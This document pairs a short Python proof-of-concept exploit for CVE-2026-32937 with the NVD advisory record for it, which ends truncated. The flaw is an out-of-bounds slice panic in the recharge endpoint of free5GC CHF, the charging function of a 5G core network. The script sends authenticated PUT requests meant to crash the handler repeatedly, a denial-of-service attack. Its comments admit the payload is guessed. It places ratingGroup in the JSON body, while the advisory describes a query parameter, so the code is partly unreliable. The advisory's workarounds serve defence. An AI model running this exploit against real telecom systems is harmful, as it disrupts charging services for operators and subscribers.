CVE-2026-32937

import requests """ PoC for CVE-2026-32937 Trigger out-of-bounds slice access in free5GC CHF. Requires authentication. """ def exploit(target_url, access_token): headers = { "Authorization": f"Bearer {access_token}", "Content-Type": "application/json" } # Malicious payload designed to trigger out-of-bounds access # The specific value depends on the internal slice logic, usually an index or malformed ID ue_id = "imsi-999999999999999" payload = { # Structure depends on the API expectation, simplified for PoC "ratingGroup": [999] } # Vulnerable endpoint url = f"{target_url}/nchf-convergedcharging/v3/recharging/{ue_id}" try: response = requests.put(url, headers=headers, json=payload, timeout=5) if response.status_code == 500: print("[+] Potential trigger successful: Server returned 500 Internal Server Error.") else: print(f"[-] Request returned status code: {response.status_code}") except Exception as e: print(f"[!] Request failed: {e}") if __name__ == "__main__": target = "http://<free5gc-chf-ip>:<port>" token = "<valid_auth_token>" exploit(target, token)

{"cve": {"id": "CVE-2026-32937", "sourceIdentifier": "[email protected]", "published": "2026-03-20T03:16:00.923", "lastModified": "2026-03-27T17:21:06.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "free5GC is an open source 5G core network. free5GC CHF prior to version 1.2.2 has an out-of-bounds slice access vulnerability in the CHF `nchf-convergedcharging` service. A valid authenticated request to PUT `/nchf-convergedcharging/v3/recharging/:ueId?ratingGroup=...` can trigger a server-side panic in `github.com/free5gc/chf/internal/sbi.(*Server).RechargePut(...)` due to an out-of-range slice access. In the reported runtime, Gin recovery converts the panic into HTTP 500, but the recharge path remains remotely panic-triggerable and can be abused repeatedly to degrade recharge functionality and flood logs. In deployments without equivalent recovery handling, this panic may cause more severe service disruption. free5GC CHF patches the issue. Some workarounds are available: Restrict access to the `nchf-convergedcharging` recharge endpoint to strictly trusted NF callers only; apply rate limiting or network ACLs in front of the CHF SBI interface to reduce repeated panic-trigger attempts; if the recharge API is not required, temporarily disable or block external reachability to this route; and/or ensure panic recovery, monitoring, and alerting are enabled."}, {"lang": "es", "value": "free5GC es una red central 5G de código abierto. free5GC CHF anterior a la versión 1.2.2 tiene una vulnerabilidad de acceso a una porción fuera de límites en el servicio CHF 'nchf-convergedcharging'. Una solicitud autenticada válida a PUT `/nchf-convergedcharging/v3/recharging/:ueId?ratingGroup=...` puede desencadenar un pánico del lado del servidor en 'github.com/free5gc/chf/internal/sbi.(*Server).RechargePut(...)' debido a un acceso a una porción fuera de rango. En el tiempo de ejecución reportado, la recuperación de Gin convierte el pánico en HTTP 500, pero la ruta de recarga permanece remotamente susceptible de desencadenar un pánico y puede ser abusada repetidamente para degradar la funcionalidad de recarga e inundar los registros. En implementaciones sin un manejo de recuperación equivalente, este pánico puede causar una interrupción del servicio más grave. free5GC CHF aplica un parche al problema. Algunas soluciones alternativas están disponibles: Restringir el acceso al punto final de recarga 'nchf-convergedcharging' solo a llamadores NF estrictamente confiables; aplicar limitación de velocidad o ACL de red delante de la interfaz SBI del CHF para reducir los intentos repetidos de desencadenar pánicos; si la API de recarga no es necesaria, deshabilitar o bloquear temporalmente la accesibilidad externa a esta ruta; y/o asegurar que la recuperación de pánicos, el monitoreo y las alertas estén habilitados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": ... (truncated)